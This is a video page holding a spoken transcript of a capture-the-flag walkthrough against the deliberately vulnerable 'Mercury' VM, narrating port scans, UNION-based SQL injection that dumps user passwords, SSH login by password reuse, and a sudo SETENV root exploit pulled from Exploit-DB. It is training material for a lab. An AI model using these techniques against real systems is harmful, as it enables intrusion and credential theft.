Hands-on Hacking Demo | CTF - Capture the Flag in 15 Minutes!

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

with so many red team security certifications focusing on hands-on practical skills anymore i figured it was a good idea to create a series in it pro tv that would address that i call it hands-on hacking and you know what i wanted to give you a little taste of what that actually looks like coming up next all right so the first thing i did was i downloaded a vulnerable virtual machine from vulnhub.com don't worry the link for that will be in the description below and this one is called mercury it's a very straightforward ctf and so i thought it was perfect for us to get our feet wet on what it looks like for us to do this hands-on hacking series build our methodology use those hacking skills that we're learning to some avail right so first thing i did was i ran an nmap scan to check out for ports now i've pre-gamed a bit of this to save some time but you will be able to see the actual commands that i use so let's start off with this file right here and map all ports this was my all scanning every port of the machine looking for openings right so if i catch and map all ports like that you'll see that all i found open was port 22 and port 8080. from there i decided to drill down a little bit deeper see exactly get some versioning information things of that nature so i've got another file right here that i called deep scan let's cap that nmap map deep scan and there you see we get a bit more information showing us what's going on here and there's a lot of really good information here obviously we have ssh is open that's not very uncommon for what seems to be a web application running on this server we can see that this server is running on port 8080 and not the typical 80 for a web service it's running wsgi server and c python 382 makes me think maybe if we're running python like that could be a python flask django kind of thing going on and that's the kind of stuff that comes from just experience so as i look through here and i kind of see what is going on i'm getting some information back from the nmap scan itself and the the probes that it sent some interesting stuff that i see right out of the gate is right there i see we've got a robots.txt file with one disallowed entry that's good something i want to make a note of if i were doing this um in maybe a testing environment right that's always good information and just kind of scrolling through here i see that this site doesn't have a title one unrecognized service okay so not a ton we know that we've got at least one robots.txt entry so that's good for us to know the other file that i have here is nick2.txt which i created by looking uh running the nick to utility let me roll back up here really quickly because i did want to show you there's the nmap scan that i ran for this right there you can see that so a dash a dash t4-n-pn-p lots of good dashes going on there but all those do something interesting and we talk more about that deeper in depth in the actual series itself okay so let's move on here let's take a look at that nictu scan so cat and nick two and we see not a whole lot happening there except for this one get silver stream all right so that's something i would also want to make a note of it says it's allowing directory listing i always like to get good directory listing you never know what kind of good files you'll find that the web server is just dishing out for you and could be interesting stuff so those are two big notes i'm going to make right now i would also normally run go buster derb durbuster something like that directory fuzzing i did that was completely fruitless it gave us nothing so i don't want to waste our time with doing that here with limited time all right now that we know that we've got our web server running on port 8080 we've got the port that or the uh ip it is that it's on i just did a ping sweep uh to figure out what that was and i've got a couple of interesting things i got a robots.txt and a silver stream business let's jump into a web browser and see what we find all right so let's put that in there so it's going to be 10.10.10.4 i'll zoom in so you can see where i'm typing just in the address box here and it's going to be on port 8080 and i'll hit go okay so we see hello this site is currently in development please check back later not a problem we know we've got at least one asset which is robots.txt and we can see it's just showing disallow the root of the thing so we're probably actually getting a redirection i could check that in burp suite to see if that's actually happening but nothing really helpful from robots.txt what was the other thing we had what was it silver stream i think it was i'll give it a whirl see if i can remember it off top of my head let's see here i think it was silver stream like that hit enter and oh man we're getting some page not found and you can see here it says django try to these url patterns in this order we see uh this is the first one it tried the name equals i'm going to give it a a file name we got robots.txt and we got this one mercury fax this is this is leaking sensitive information you can see why that's happening you're seeing this error because debug equals true so that's that's a big naughty on the on the o wasp top 10 list right there that you're leaking that sensitive information so now that i know that mercury fax is probably a good directory i'm going to copy that and then just slap it on up in here and paste all right hit enter and we do get a picture of mercury excellence that's interesting right that looks like the moon but maybe it's mercury it's pretty awesome and uh mercury facts we've got load to see a fact and we've got this to-do list start there let's check out the dude the to-do list add css obviously it's not styled very well implement authentication using the users table ah that's something i want to keep my eye on use models in django instead of direct my sql call so now i've learned a little bit more i learned that they're using a user's table that's in a mysql database we also saw some of that information back in our previous uh 404 hour at least i think i did but if that is the case that means that there's probably a sql injection to be found in this lovely little ctf so let's go back let's take a look at these mercury facts i always want to cover all our bases it does say fact id 1 mercury does not have any moons or rings and if you look up in the url you've got mercury facts and then forward slash one well what if i change this to two you'll see that it changes the fact id to two mercury is the smallest plan i could probably do three and so forth but what i'm seeing here is this might be where i could perform sql injection so i'm just going to try to test that by adding a single quotation like so and hitting enter and you'll notice i am now definitely getting a sql error you have an error in your sql syntax telling me where giving me all sorts of really interesting information if you scroll through this page it is extremely verbose lots of really interesting information here but at least i know right now that we do have sql injection and i can start trying my sql injection techniques to get farther all right so if that's the case i can do i want to check how many columns there are so i'm going to do an order by i'll try one and i'll use the octathorp with the hashtag to see if i can't use that as an inline comment to stop the rest of the sql all right so that works so that means there's at least one column let's try two i'm looking for it to break all right so there's only one column for us to use that's that's good to know all right let's go back so now that we know we have one column we can ditch this order by we can use a union select select statement like that let me get my mouse out of the way for you and what i'm going to do is i have that one column i just want to start throwing some sql edit i could use like what's the user grab that like what user is running the database itself and then just throw that on the end and you can see right there it kicked that back to me dbmaster at localhost okay so my sql injections are working great i'm i'm on my way to cracking this database so let's let's look into the database a bit so what i'm going to do is i'm going to try to get the table name so under table underscore name and that's going to be from information a-t-i-o-n underscore schema s-c-h-e-m-a i can never spell these things let me move over a bit information schema.tables don't forget my comment let's see if that works perfect so now it's dumping all the table names for me to see and i do see as we recall there is a users table that we saw back in those notes that to do list right excellence so let's enumerate the columns for that table get back in our url here kind of just pull some of this out we're going to remove table name and we're going to change that to column underscore name from information underscore shima dot columns from table table underscore name equals users and then octathorp that all right so i got a bit of a problem in my i probably just misspelled something union select column name from information underscore shima dot columns from table name equals users that seems to be right but i'm sure it's just a syntax error because that's what it's telling me it is a syntax error all right let's go back let's play around with this a little bit select column name from information schema.columns from table name oh that's the problem it's not from it's aware that's what's going to help me out there look at that things work really well when you do that okay now we see we've got id password and username okay so some really good columns i only have one that i can output so i'm gonna have to do these one at a time i think we'll start with username then go to password that's probably what i want all right so now that i know that those are the actual columns i can say union select and i want username from and the table name is users comment that out and there we go there's a list of the users john laura sam and webmaster is probably the one i want to know about and then i'll just go back in here and change it to passwords i think it is just password yep it's password and there's all their passwords johnny1987 love my kids love my beer who doesn't and mercury is the size of 0.5056 earth's i'm going to copy this and now since we haven't found any login the only place i've seen where a username and password should work is on that ssh right so let's go try this we have webmaster and we've got webmaster's password let's see if there's any password reuse going on here so i'm going to clear i'm going to say ssh not too many yeses not enough esses and it was web master at and i'll give the ip address which is four all right pop the password in there and hey we've got login excellent so now we've got some shell access to this machine now let's do an ls we've got a user flag there we could read that that's good for us making some headway into this ctf we have captured a flag let's go into that mercury projects list cd into mercury proj do an ls let's see you got this notes dot text that looks interesting let's cap that and we see project accounts both are restricted there's webmaster and then there's linux master which says for linux stuff so linux master is probably the administrative user for this system looks like the password is base64 encoded so i'll just copy this and then i will echo that paste that out and then pipe that into base 64 and then dash d to decode it we hit that and there is what looks to be the decoded password let's copy this and then let's try to sgu as linux master this is the switch user i'll paste the password in and we can see that we have changed to linux master excellent all right let's go to linux masters home see if anything interesting in there nothing i could start looking at hidden files and things but one of the things i like to do straight out of the bat when i get some access is do a sudo dash l it's going to ask for my password paste that back in and it tells me i can do set end from uh for this user bin check syslog.sh okay so maybe there is a privileged escalation from sudo using that set end what i'm going to do here is i'm going to just split my my terminal here i'll increase the font so we can actually see these things and i'm going to do a search split search splits search which is the exploit db's local copy tool utility so you can search for exploits known exploits and i'll just type in set end we see we get a couple of results one's for apache which we're not running right we're running python not apache here and we also see one for sudo default set in local privilege escalation it's exactly the kind of thing we're looking for so i just need to copy that over so let's do that i will copy slash user share share exploits db exploits multiple local and then it is 7129.sh and i'll just call it exploit.sh like that for whatever reason a lot of times i get some encoding issues so i'm going to do a dos 2 unix command on the exploit itself so it's converting it to a unix format because that's what we're working in from there i should be able to dish this up using python dash m simple 8 oop simple http http server and i'll put it on port 80. this is on my local machine so basically i'm just starting a really quick and dirty web server so that i can grab this with wgets all right i believe my ip is 10.3 so i will do a wget http 10 to 10.3 and it is exploit.sh we see that the connection was made it file was transferred i do an ls i see that exploit sh is there i can go ahead and kill this and i'll exit out of there all right we're making some headway i'm going to do a ch mod to make this executable just add the plus x and it is exploit.sh and then we should see it as green and then we just fire it off exploits dot sh and see what happens okay so it says please give me a program to run via sudo well good news is it ran sudo l for us and shows that we have one so i'm going to grab that program copy that and then we'll rerun our exploit with that tacked onto the end and we can see congratulations it's a root shell i do an id i am root i can cd2 root do an ls there's the root flag right there we have rooted this box from start to finish hopefully that helps you get an idea of what we're going to be doing in the hands-on hacking series going from boot to root and figuring out a really good methodology as we work our way through multiple different types of boxes so i hope you enjoyed this and i hope to see you there

Info

Channel: ITProTV

Views: 30,172

Rating: undefined out of 5

Keywords: ctf hacking demo, hands on hacking tutorial, hands-on hacking, hands on hacking, hacking demo, ctf hacking, capture the flag hacking, hacking demonstrations, how to learn hacking, hacking challenge, capture the flag, ethical hacking, hacking tutorial, exploit tutorial, how to hack, cybersecurity hacking, cybersecurity traning, hacking tutorial for beginners, hacking training course, ethical hacking training course, security training course

Id: 5gLA6fMqtZY

Channel Id: undefined

Length: 15min 59sec (959 seconds)

Published: Wed Oct 07 2020